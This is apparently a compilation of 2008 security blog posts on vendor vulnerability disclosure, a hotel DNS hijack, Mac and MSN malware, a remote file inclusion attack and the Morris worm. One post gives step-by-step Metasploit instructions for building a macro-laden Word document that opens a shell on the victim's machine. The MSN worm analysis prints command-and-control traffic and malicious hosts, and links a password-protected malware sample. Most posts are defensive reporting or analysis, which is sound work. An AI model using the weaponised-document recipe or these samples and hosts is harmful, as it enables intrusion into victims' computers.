Chad Dougherty of the CERT Vulnerability Analysis team posted an article on some guidelines the vendor can follow so that their product vulnerability can be communicate to them. Security Experts always try to stick to responsible Full Disclosure rules before making any vulnerability public. So if they are unable to contact the vendor for a long period of time, the vulnerability is made public which can in turn affect it’s many users. To brief the recommendations:

1. Vendor must provide an easily identifiable role email address specifically for product security issues such as “product-security@”, “security-team@”, “security-response@”. Use of standard email addresses such as “info@”, “support@”, and “webmaster@” for the security point of contact as these email ids may be receiving other generic mails too and critical vulnerability information can easily be overlooked or mishandled.

2. Providing a web-based reporting form can help to maintain the vulnerability information in well structured manner that can later be reffered too.

Sample vulnerability reporting form can be found here.

3. Since the vulnerabilities contain sensitive information, it is recommended to encrypt the vulnerability details while generating reports or sending mails to concerned person.

4. Vendor must provide a web-page at “/security” like in “www.product.com/security” which will contain security related issues regarding the product. This can be the information base of all security documents and known security issues pertaining to the product.

5. Send out “signed” email to customers/partners regarding the vulnerability and the patch details which can help them mitigate the issue.

The article concludes with

Vendors’ attention to product security is receiving increased scrutiny in security and IT communities.  Presenting organized methods for communicating product security information is an important element to demonstrating to customers (both current and potential), security researchers, the media, and the general public that you have at least some awareness of and commitment to security. 

In a hotel in Beijing, using their wifi in the lobby. Everything goes fine until Noam tells me my email headers are weird.

Return-Path: aviram@hsia.com.cn
[…]
Received: (qmail 9613 invoked from network); 19 Nov 2008 13:26:43 -0000
Received: from mail.hsia.com.cn (HELO hsia.com.cn) (61.152.154.60)
by 0 with SMTP; 19 Nov 2008 13:26:43 -0000
Received: from FBH.hsia.com.cn ([123.124.225.63])
by hsia.com.cn (8.13.1/8.13.1) with ESMTP id mAJDTJlY005475;
Wed, 19 Nov 2008 21:29:20 +0800
Received: from beat.local (unknown [172.31.8.65])
by FBH.hsia.com.cn (Postfix) with ESMTP id 8AFEB520B0;
Wed, 19 Nov 2008 21:13:54 +0800 (CST)

Clearly I’m sending through another SMTP server, who goes as far as mangling my ‘Return-Path’ address header.

Only I’m not. My SMTP server is set (as always) to the corporate SMTP who is accessible through the VPN, in an encrypted connection that should not allow anyone to change fields. Just in case, I check it again. Yup, the SMTP server is there. So what’s up?
A quick investigation shows the following: The hotel’s network blocks my VPN (as some of them do) but happily resolves any unresolvable host name (such as my SMTP server’s hostname). This is resolved to a catch-all server that proxies everything. Transparently. (well, almost)

Lesson learned. Changed the hostname to the IP, and will soon switch to SSL based SMTP who will authenticate the server. In the meanwhile - be careful from helpful Beijing wifi providers who are only too happy to forward your mail on! (with some changes, of course).

This is actually a nice little feature of Metasploit which many of us are not aware. Here I will guide you through this.

Metasploit is nice tool written in ruby and very useful to penetration testers (and script kiddies) It provides good information on exploit techniques and is also a useful resource for exploit developers and security professionals. Latest release is 3.1 version as of now and its upcoming version 3.2 will be more hack-pack.

Enough of insight into metasploit, now back to action. We will create a malicious .doc file which will spawn a tcp shell on port 8888 on simply opening the file. However remember that MACROs must be enabled on victim’s system.
1. Go to Start–>All Programs–>Metasploit–>CMD SHELL.

2. type cd %APPDATA%
3. Next type in: ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba
4. Now to use this malicious vba file, open Microsoft Word/Excel.

5. Go to tools–>Macros–>Visual Basic Editor. Copy the contents of vba file and paste in the VB editor.

6. To enable macro tools–>Macros–>Security. Select the security level as low.

7. Now save the doc file.

8. On opening the seemingly harmless file, it will automatically spawn a cmd shell on port 8888.

Telnet on that port to spawn a command shell.

So now we have a malicious doc ready for action. We can use any available payload like connect back to attacker or even vnc inject payload. Hope this is helpful.

New Trojan horse for Mac environment has been discovered.

The Trojan is known as OSX.Lamzev.A by Symantec.

When it is executed it will create the file ezmal to the Applications folder (the name is Applications in localized installations too).

The names of earlier widely known OS X malware are Mac.Hovdy.a (June ‘08), OSX.Exploit.Launchd (June ‘06) and Leap.A (February ‘06). When saying ‘widely known’ it doesn’t mean that they were widely spreaded.

I remember the exact number of 63 when talking about known Mac malware.

There are no worms for Apple - yet.

Are viruses attracted to me specifically or it happens to everyone and they just don’t notice or say nothing about it. It getting really hard to speak with people using instant messengers and to be sure it is them sending you a message and not a virus.

Before i begin, let’s notice a few close viruses
This: http://www.cisrt.org/enblog/read.php?106
Is a different one, older one from July. Reported and still not fully detected by vendors.

Now for the painful part, this:
http://blog.threatfire.com/2008/06/msn-im-worm.html
a little older variant that was covered in June!!! that is 5 month ago!! the detection rates were nasty, they still are as you will see afterwards…
The point I don’t get is why don’t AV vendors take care of the missed detections at least AFTER some security researcher publishes an analysis?!

I got a message from a friend who is currently having a trip in thailand and i was amazed to see that his computer sent me a message with a link with my msn email in it. I clicked the link and here a file download prompt pops up and the file name is: “virus-PIC006.JPG-www.myspace.exe”.
Well, as tired as i may be, i would never be THAT tired to execute it

So i saved it and started to analyze!
Well what is it? it is a self extracting cab archive(almost original with resource details spoofed to be a microsoft file! (it even looks like it was edited manually using a tool such as Resource Hacker)
File Version: “6.0.2900.2180″
Description: “Win32 Cabinet Self-Extractor ” (may be they thought we won’t notice the spaces
Company: “Microsoft Corporation”
File Version: “6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)”
Internal Name: “Wextract ”
Language: “English (United States)”
Original File name: “WEXTRACT.EXE ”
Product Name: “Microsoft® Windows® Operating System”
Product Version: “6.00.2900.2180″

Well again it seems that Winrar is more effective than an Anti-Virus, where it detects it as a self-extracting archive so i know it’s no simple exe:

The funniest think about this “trap file” is that it has double extension of .jpg………..exe that comes with the default icon of a jpeg file

BUT when you switch to DETAILS view in the browser, then you see its 16×16 icon which is a setup icon:

Dear bad guys! use some of that money you steal to do some Q&A for your bot droppers!
O.K let’s see if our friends know it:

9 of 36…wow!
Could it be that Symantec, Mcafee, Kaspersky, F-Secure, Panda, Sophos all the great brands does not even suspect it?! and that Microsoft which is quite new in the AV business catches it?! I want to point out Dr. Web again for being a good detector(comparing to the concept of an Anti-Something) as Kaspersky once were, before they went to enterprise and from tech to GUI (if i was kaspersky, i would by dr web…just a thought)

So we extract the sfx and we get a file called test.exe with a jpg icon, this time it’s not an archive, here comes the real shame, it is not even packed!!!
Let’s see if our friends know it:

it is just a simple VC++ executable that uses dynamic function calls with the simplest use of a rolling xor running on the string “somenigz’, quite amusing

.text:0040122E mov [ebp+var_340], 0
.text:00401238 push offset Source ; “¦âöÉàöíâPÆöé馔
.text:0040123D call sub_401000
.text:00401242 add esp, 4
.text:00401245 push eax ; lpProcName
.text:00401246 push offset aFgqfaXaa ; “Üöâƒö¥-+¯ò¥¥”
.text:0040124B call sub_401000
.text:00401250 add esp, 4
.text:00401253 push eax ; lpModuleName
.text:00401254 call ds:GetModuleHandleA
.text:0040125A push eax ; hModule
.text:0040125B call ds:GetProcAddress

You can see these letters “Üöâƒö¥-+¯ò¥¥” which are clearly XORed sent to a function, the classic “decrypt my dll name and then the function in it and call it”. Of course “sub_401000″ is the decrypt function:

.text:0040105D Rolling_Xor_Loop: ; CODE XREF: sub_401000+85j
.text:0040105D mov edx, [ebp+var_C]
.text:00401060 add edx, 1
.text:00401063 mov [ebp+var_C], edx
.text:00401066
.text:00401066 loc_401066: ; CODE XREF: sub_401000+5Bj
.text:00401066 cmp [ebp+var_C], 9
.text:0040106A jnb short loc_401087
.text:0040106C mov eax, [ebp+Str]
.text:0040106F add eax, [ebp+var_8]
.text:00401072 mov ecx, [ebp+var_C]
.text:00401075 mov dl, [eax]
.text:00401077 xor dl, byte ptr aSomenigz[ecx] ; “somenigz”
.text:0040107D mov eax, [ebp+Str]
.text:00401080 add eax, [ebp+var_8]
.text:00401083 mov [eax], dl
.text:00401085 jmp short Rolling_Xor_Loop

Decoded XORed strings, by order, are:
CreateProcessA
kernel32.dll
NtUnmapViewOfSection
ntdll.dll
VirtualAllocEx
kernel32.dll
WriteProcessMemory
kernel32.dll
GetThreadContext
kernel32.dll
SetThreadContext
kernel32.dll
ResumeThread

This shows us this was not written by simple kids! this is a professional code injection using thread contexts, this teaches us that the guys “on the wild” have learned beyond besides CreateRemoteThread!!!

It seems that this version relates to: burimilol.com which is unknown to “norton safe web” (yeah right): https://safeweb.norton.com/report/show?name=burimilol.com but it’s older variant is known “burimilol.net”: https://safeweb.norton.com/report/show?name=burimilol.net
What separates us from the criminals is the “protected domain services” which is mostly used by criminals…again no internet cops

Now it executes itself! parses its duplicate’s PE and sections and injects code into it!
Then it dumps a hidden exe in %windir%(c:\windows) called fxstaller.exe(48kb) which this time has a jpg icon in both the 32×32 and the 16×16

This exe drops/downloads image.exe(48kb) in a new temp folder in %temp%

This results are crippy!!! i guess Dr.Web also failed and there is no one left to trust but Microsoft!
Then service.exe(144kb) is dropped at %windir$\system32\service.exe, a hidden file with a darth vader icon

This exe of darkness downloads and executes a file to c:\msn.exe

Now some deeper information, for the researchers among us. Why their url is not blocked?! because they are tricky!!!
They “try” do download http://www.freewebtown.com/tatrusa/test2.jpg which redirects to
http://fwt.txdnl.com/6-40/t/a/tatrusa/test2.jpg
Then it requests
GET /cn?sid=40545F5A4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F5C2B282F2D5A5C5A2D5E2C5D5A5B282B2B5E582C5F5151592D2C515D2A5A5A4F081D544F131854594F1D1954594F080F0F000D54585F515D51504F04061B1901000D5408075B0E4F1B0C1F000D54505C505B692901 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 85.17.166.233

And gets

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2008 00:04:56 GMT
Server: Apache/2.0.61 (FreeBSD) PHP/5.2.3 with Suhosin-Patch mod_fastcgi/2.4.2
Set-Cookie: sid=EE1DDFD5947B45F595556BD6D7E9C1A7; expires=Sat, 07-Nov-2009 19:04:56 GMT

g_InstallDll: http://77.93.75.153/img/upd.dll
Content-Length: 127
Connection: close
Content-Type: text/html

34034a4615431643424540474651151e4a4640445116034a354344403134363435464641464633333543454346414f434f4e3431313131315104114a047743

Then it sends stuff about me, to get the commands for this cool trojan!

POST / HTTP/1.1
g_Version: 1156
g_ClientGUID: ,`Xc,q!`!q-Kk!JcXX-yK9NNGqKNk=!!
g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,
g_SetID: [QJx
g_AffiliateID: y9NkNh
g_ResourceID: MnOM
g_URL: 8

g_Client: .Sf”yhJ:y9N:y!y:9` %?[H[Q]F:FBxFf@8/FQ”`:y:J9GGg)O?BFVO S[VE Ji8.K”-:G:`-!G:y!8vR”^yJG8Z}V”|OW?Om8*) uOxFfUO?On U}” =?}m8rc=”GG^G!^aa^NG^`9^Gk8*K [VV}]QUf”0S*S!p[IO”f[n[f)rvSp[IO”f[n[fb8 =?}m86Wn”GGGGGkGh>#GGGGGkGq8p]IWO? }a H?}VOff}?f” y8.f_fO?cnIFQ” 1Of8o)]VV=}QQ”QOBO?o=}QQ”QOBO?o=}QQp]I”Go,FAO” =”z/.pq*/)zf~fUOI!JzQQQAPFF.:nAAo.QF fFMO” !kkoqOaX?}mfO?”D=”zS?}x?[I ,FAOfz.QUO?QOU KYHA}?O?z.KeSZ*uK:KeKD ^Q}’}IOoqOfEU}H)~fUOI”qOfEU}Ho
g_GZipSupported: U?]O
g_RevID: h9J-
g_First: y
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: bescoro.com
Content-Length: 37
Cache-Control: no-cache

)vcv.)v.=) 0%nDDn@%r}MFAA[|FfU}?~” @b

And gets:
HTTP/1.1 200 Ok
Server: nginx/0.5.35
Date: Thu, 13 Nov 2008 00:05:26 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Pragma: No-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 219
Content-Language: en
Set-Cookie: uid=Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,; expires=Mon, 09-Dec-2007 13:46:00 GMT
Set-Cookie: guid=,`Xc,q!`!q-Kk!JcXX-yK9NNGqKNk=!!; expires=Mon, 09-Dec-2007 13:46:00 GMT
Set-Cookie: cn=y; expires=Mon, 09-Dec-2007 13:46:00 GMT
Location:
Test: [B[FA
g_AdCategory: )}IO
g_ConnectionPerDay: k
g_MaxCategoryAppearances:
g_Popup: U?]O
g_PopupPerDay: yGy
g_RSD: ‘UUH”88}WFOWO:V}I8x}88o’UUH”88nO?}]fUF:V}I8x}88o
g_RedirectServers: ‘UUH”88NJ:hN:J!`:!`8x}88o’UUH”88N`:y-:y99:y-G8x}88o’UUH”88N!:ykh:yy`:ykN8x}88o
g_RevFlag: G
g_ServerIPs: gWOfV}?}:V}I”NGigNh:yNN:y9:!9″NGigN!:ykh:yy`:yk-”NGi
g_SetIDWas: _Q?OAO[fOn
g_StatisticsUploadDelay: y
g_StealFocus: a[AfO
g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,
g_URL: 8

Y.r.r..G…..=……Q..|$u..kM.+`…….u..-.L..7…7{G.
.w.=.(r…%…….u……..NsGD.a.2…g.d….I.6..:T………….R.L_……$6.G…….RZeZ>
+=/~..`Y. ……..B……..X
..’.a.b..7…O>n.i..Y.._9_%.
…qre../.p.

Then it “trys” to download http://www.freewebtown.com/tatrusa/oos.jpg and again redirected to: http://fwt.txdnl.com/6-40/t/a/tatrusa/oos.jpg
Then it downloads http://www.j2arts.com/images/msn.exe to c:\msn.exe
From here it looks like it is the same old tech viruses (keyloggers and the classics, i don’t have time for these files…..):
rundll32.exe C:\WINDOWS\system32\vtUolLBS.dll,a (vtUolLBS…. == random name)
rundll32.exe C:\WINDOWS\system32\nnnljiiI.dll,c
rundll32.exe C:\WINDOWS\system32\iifgHbyY.dll,a

So let’s summarize!

Evil hosts:
burimilol.net
burimilol.com
www.j2arts.com
www.freewebtown.com
fwt.txdnl.com
bescoro.com
77.93.75.153
85.17.166.233

The AV vendors should receive my scanned files from virustotal.
I will also make an exception on this one and upload a sample for all the involved executable!
http://www.linkstofiles.com/MSNWorm.rar
archive password: “virus”

Stop them, sue them, black list them, hack them, they are stealing from all of us!
Fight for digital law enforcement!!!

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)

Calcalist reports that the wired network in a recent google developers conference in Israel was hacked during the conference. I haven’t seen that report anywhere else, but the reporter Dora Kishinevski is fairly level headed with little tendency for sensational stories so I’m marking it as probably true.

According to the article, google sent a follow up email to the participants and warned them the network was compromised. This is interesting first because the attack was on the wired and not wireless Internet, which is considerably harder to do without being caught, and second because it reminds us how insecure gmail is over compromised lines (as opposed to, for example, a corporate VPN). I’m willing to bet close to 100% of the participants used gmail while in the google conference.

The article also quotes google as writing “We recommend you change your password, just in case, to any site you visited using the wired connection”. Definitely.

RSA Security’s Blog has information about the seriousness of the Sinowal banking Trojan.

Like many of us know this Trojan aka Trojan-PSW:W32/Sinowal.CP and Trojan.Mebroo uses so-called MBR rootkit technique.

Link here.

Randy Abrams recently pointed out to me that today is the 20th anniversary of the Morris Worm. For all you kids out there who have no recollection of this event, I’ve just posted a blog at http://www.eset.com/threat-center/blog/?p=165 that recaps on the worm and includes some relevant references, but right now I want to expand on a thought I had while I was writing it.

The Morris worm was very much of its time. It was a proof of concept (actually of several concepts) item of malware that showed a certain interest in and knowledge of some vulnerabilities that were current at that time (mostly a fingerd buffer overflow exploit and a somewhat flaky implementation of sendmail debugging), and was clearly meant to be self-launching. Most current malware, while it may well use drive-by downloads and other exploits, seems to use some form of social engineering. So maybe the earlier CHRISTMA EXEC worm was the real pioneer, with its mass mailing payload and its chainletter appeal to the gullibility of the victim. Well, we can draw dotted lines between old and new malware from now to Christmas, which is the sort of thing that interests saddos like me but doesn’t necessarily gain us much in terms of securing the internet.

Looking through some historical resources, it strikes me that there are some moments in malware history that not only define the time, but in some way draw a line under it, though Morris was followed by a copycat VMS worm the following year). After that, though, we waited quite a while for a real mass mailer epidemic and for the big network worms of this decade. Melissa managed to mark both the beginning of heavy duty mass mailers and the end (or at least the decline) of macro malware. Yet there are no full stops here. In 2008, we’re still seeing new(-ish) stuff cheek-by-jowl with the sort of malware we’ve mostly forgotten about: old-time boot sector viruses and new-age MBR rootkits; macro viruses and office suite exploits; overflows and drive-bys; and an endless loop of social engineering tricks (phishes, 419s, fake admin messages, fake codecs, fake updates…) The only really substantial change is the disappearance of the hobbyist hacker/malware author, promoted into full-blown cyber-criminality.

It seems that what we really need to patch is human nature: the evil gene, the greed gene, the careless gene, the “what’s a patch?” gene, the “I can click on anything because I have anti-virus software” gene…

David Harley CISSP FBCS CITP
ESET LLC